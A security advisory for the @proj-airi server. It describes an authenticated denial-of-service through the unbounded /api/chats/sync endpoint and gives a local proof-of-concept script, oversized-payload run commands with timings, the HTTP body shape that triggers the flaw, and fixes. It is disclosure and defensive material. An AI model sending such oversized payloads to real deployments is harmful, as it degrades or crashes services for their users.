Summary (one paragraph)
@proj-airi exposes an authenticated endpoint POST /api/chats/sync that accepts a JSON body containing an unbounded messages array with unbounded content strings. The handler parses the full JSON body in memory and then performs per-message database reads/writes inside a transaction. An authenticated attacker can submit an oversized request (or many moderately large requests) to cause high CPU usage, high memory usage, and heavy database load, leading to denial of service (slowdown and/or OOM).
Vulnerability details
Root causes
- No request size limits in the schema (valibot)
  - File: apps/server/src/api/chats.schema.ts
  - messages: array(ChatSyncMessageSchema) is unbounded.
  - content: string() is unbounded.
  - chat.id, chat.title, and message.id are unbounded strings too.
- No server-side body size limit / streaming guard
  - File: apps/server/src/routes/chats.ts
  - The handler calls await c.req.json() and then validates, meaning the full payload must be read and parsed before it can be rejected.
- Per-message DB lookup and write in a loop
  - File: apps/server/src/services/chats.ts
  - For each message, the service does a findFirst by message id and then an insert or update.
  - This makes processing O(n) database operations for n messages (and in practice can be worse, depending on indexes and IO).
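The first two root causes compound: JSON.parse must materialize the entire body on the heap before any schema check can run, so memory scales with attacker-controlled input regardless of validation. A standalone sketch (no Hono or valibot involved; the shape and numbers are illustrative):

```typescript
// Build a ~10 MiB JSON body the way an attacker would, then parse it whole.
// Every byte must be heap-resident before validation can reject anything.
const content = 'A'.repeat(1024)
const body = JSON.stringify({
  messages: Array.from({ length: 10_000 }, (_, i) => ({ id: `m-${i}`, content })),
})

console.log(`body bytes: ${Buffer.byteLength(body)}`) // ≈ 10.5 MB

const parsed = JSON.parse(body) as { messages: { id: string, content: string }[] }
console.log(parsed.messages.length) // 10000
```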
Proof of Concept
PoC A: in-repo script that exercises validation + DB writes
This PoC uses the current schema and the current syncChat implementation with an in-memory Postgres-compatible DB (PGlite) and demonstrates that large message batches cause significant server-side work.
import { performance } from 'node:perf_hooks'
import { createRequire } from 'node:module'
import { PGlite } from '@electric-sql/pglite'
import { vector } from '@electric-sql/pglite/vector'
import { sql } from 'drizzle-orm'
import { drizzle } from 'drizzle-orm/pglite'
import { safeParse } from 'valibot'
import { ChatSyncSchema } from '../api/chats.schema'
import * as chatSchema from '../schemas/chats'
import { createChatService } from '../services/chats'

function formatBytes(bytes: number) {
  const units = ['B', 'KB', 'MB', 'GB'] as const
  let value = bytes
  let unit = 0
  while (value >= 1024 && unit < units.length - 1) {
    value /= 1024
    unit += 1
  }
  return `${value.toFixed(2)} ${units[unit]}`
}

function makePayload(messageCount: number, contentBytes: number) {
  const content = 'A'.repeat(contentBytes)
  const createdAt = Date.now()
  return {
    chat: {
      id: 'poc-chat',
      type: 'group' as const,
      title: 'poc',
      createdAt,
      updatedAt: createdAt,
    },
    members: [
      { type: 'character' as const, characterId: 'default' },
    ],
    messages: Array.from({ length: messageCount }, (_, i) => ({
      id: `m-${i}`,
      role: 'user' as const,
      content,
      createdAt,
    })),
  }
}

async function createInMemoryDB(schema: Record<string, any>) {
  const require = createRequire(import.meta.url)
  // drizzle-kit is CJS; require() avoids ESM interop issues
  const { pushSchema } = require('drizzle-kit/api') as typeof import('drizzle-kit/api')
  const client = new PGlite({
    extensions: { vector },
  })
  const db = drizzle(client, { schema }) as any
  await db.execute(sql`CREATE EXTENSION IF NOT EXISTS vector;`)
  const { apply } = await pushSchema(schema, db)
  await apply()
  return db
}

async function main() {
  const messageCount = Number(process.env.MESSAGE_COUNT ?? '5000')
  const contentBytes = Number(process.env.CONTENT_BYTES ?? '2048')
  const userId = process.env.USER_ID ?? 'poc-user'
  console.log(JSON.stringify({ messageCount, contentBytes, totalContentApprox: formatBytes(messageCount * contentBytes) }))

  const payload = makePayload(messageCount, contentBytes)

  const mem0 = process.memoryUsage().heapUsed
  const t0 = performance.now()
  const parsed = safeParse(ChatSyncSchema, payload)
  const t1 = performance.now()
  const mem1 = process.memoryUsage().heapUsed
  if (!parsed.success) {
    console.error('Schema rejected payload:', parsed.issues)
    process.exitCode = 2
    return
  }
  console.log(`safeParse(ChatSyncSchema): ${(t1 - t0).toFixed(1)} ms, heap +${formatBytes(mem1 - mem0)}`)

  const db = await createInMemoryDB(chatSchema)
  const chatService = createChatService(db)

  const t2 = performance.now()
  const res = await chatService.syncChat(userId, parsed.output)
  const t3 = performance.now()
  console.log(`chatService.syncChat: ${(t3 - t2).toFixed(1)} ms, result: ${JSON.stringify(res)}`)
}

// eslint-disable-next-line antfu/no-top-level-await
await main()
Run:
# ~10 MiB total message content (5000 * 2048 bytes)
MESSAGE_COUNT=5000 CONTENT_BYTES=2048 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts
# ~20 MiB total message content (20000 * 1024 bytes)
MESSAGE_COUNT=20000 CONTENT_BYTES=1024 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts
Observed (representative) results on my machine:
- MESSAGE_COUNT=5000, CONTENT_BYTES=2048 → syncChat ~2.2 s
- MESSAGE_COUNT=20000, CONTENT_BYTES=1024 → syncChat ~8.4 s
In production (real network, JSON parsing overhead, real Postgres IO, concurrent requests) the impact will generally be worse.
PoC B: HTTP request shape (authenticated)
The HTTP body shape that triggers the issue:
{
  "chat": { "id": "any-string", "type": "group", "title": "optional", "createdAt": 0, "updatedAt": 0 },
  "members": [{ "type": "character", "characterId": "default" }],
  "messages": [
    { "id": "m-0", "role": "user", "content": "....very large....", "createdAt": 0 }
  ]
}
Increasing messages.length and messages[i].content.length increases server work and resource usage.
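How the body size grows with those two knobs can be sketched without sending anything; the function below mirrors the JSON shape above (pure size accounting, illustrative values):

```typescript
// Byte size of the sync body for a given message count and content length.
function bodyBytes(messageCount: number, contentLength: number): number {
  const body = {
    chat: { id: 'any-string', type: 'group', title: 'optional', createdAt: 0, updatedAt: 0 },
    members: [{ type: 'character', characterId: 'default' }],
    messages: Array.from({ length: messageCount }, (_, i) => ({
      id: `m-${i}`,
      role: 'user',
      content: '.'.repeat(contentLength),
      createdAt: 0,
    })),
  }
  return Buffer.byteLength(JSON.stringify(body))
}

console.log(bodyBytes(1, 16))        // small baseline request
console.log(bodyBytes(20_000, 1024)) // ~21 MB the server must buffer and parse
```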
Recommendations / fixes
- Enforce body size limits at the HTTP layer for /api/* (or at least /api/chats/sync). If using Hono, add a strict body size limit middleware before c.req.json().
- Add schema bounds in ChatSyncSchema:
  - messages: maxLength(...) (e.g., 100–1000 depending on expected use)
  - content: maxLength(...) (e.g., 10k–100k)
  - id/title: maxLength(...)
- Avoid the per-message findFirst:
  - Use bulk upsert / batch insert.
  - Or prefetch existing IDs in a single query, then insert/update in batches.
- Rate limit the endpoint by user/session and/or IP.
- Consider quotas (e.g., max messages per chat per day, max bytes).
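The schema bounds can also be enforced as a cheap guard in plain TypeScript, independent of the validator. A minimal sketch — the limits, type names, and checkBounds helper below are illustrative, not taken from the codebase:

```typescript
// Illustrative limits — tune to real product usage before adopting.
const MAX_MESSAGES = 500
const MAX_CONTENT_LENGTH = 32_768
const MAX_ID_LENGTH = 256

interface SyncMessage { id: string, role: string, content: string, createdAt: number }
interface SyncPayload { chat: { id: string, title?: string }, messages: SyncMessage[] }

// Returns a rejection reason, or null if the payload is within bounds.
function checkBounds(payload: SyncPayload): string | null {
  if (payload.chat.id.length > MAX_ID_LENGTH)
    return 'chat.id too long'
  if ((payload.chat.title ?? '').length > MAX_ID_LENGTH)
    return 'chat.title too long'
  if (payload.messages.length > MAX_MESSAGES)
    return `too many messages (max ${MAX_MESSAGES})`
  for (const m of payload.messages) {
    if (m.id.length > MAX_ID_LENGTH)
      return 'message id too long'
    if (m.content.length > MAX_CONTENT_LENGTH)
      return 'message content too long'
  }
  return null
}
```

With valibot, the equivalent is piping maxLength actions onto the string and array schemas so oversized payloads fail during validation rather than deep in the service layer.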
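The prefetch-then-batch pattern for replacing the findFirst loop can be sketched with a Map standing in for the messages table; a real implementation would issue one SELECT ... WHERE id IN (...) and one bulk INSERT with an ON CONFLICT update (names here are illustrative):

```typescript
interface Msg { id: string, content: string }

// `table` stands in for the messages table. Instead of one findFirst per
// message, do a single membership check over all incoming IDs, then two
// batched writes — a constant number of round trips instead of O(n).
function syncMessages(table: Map<string, Msg>, incoming: Msg[]) {
  // Equivalent of one SELECT id WHERE id IN (...):
  const existing = new Set(incoming.map(m => m.id).filter(id => table.has(id)))
  const toInsert = incoming.filter(m => !existing.has(m.id))
  const toUpdate = incoming.filter(m => existing.has(m.id))
  for (const m of toInsert) table.set(m.id, m) // one bulk INSERT
  for (const m of toUpdate) table.set(m.id, m) // one bulk UPDATE / upsert
  return { inserted: toInsert.length, updated: toUpdate.length }
}
```

With drizzle, the prefetch roughly maps to inArray(messages.id, ids) and the write to a single insert(...).values(batch) with onConflictDoUpdate.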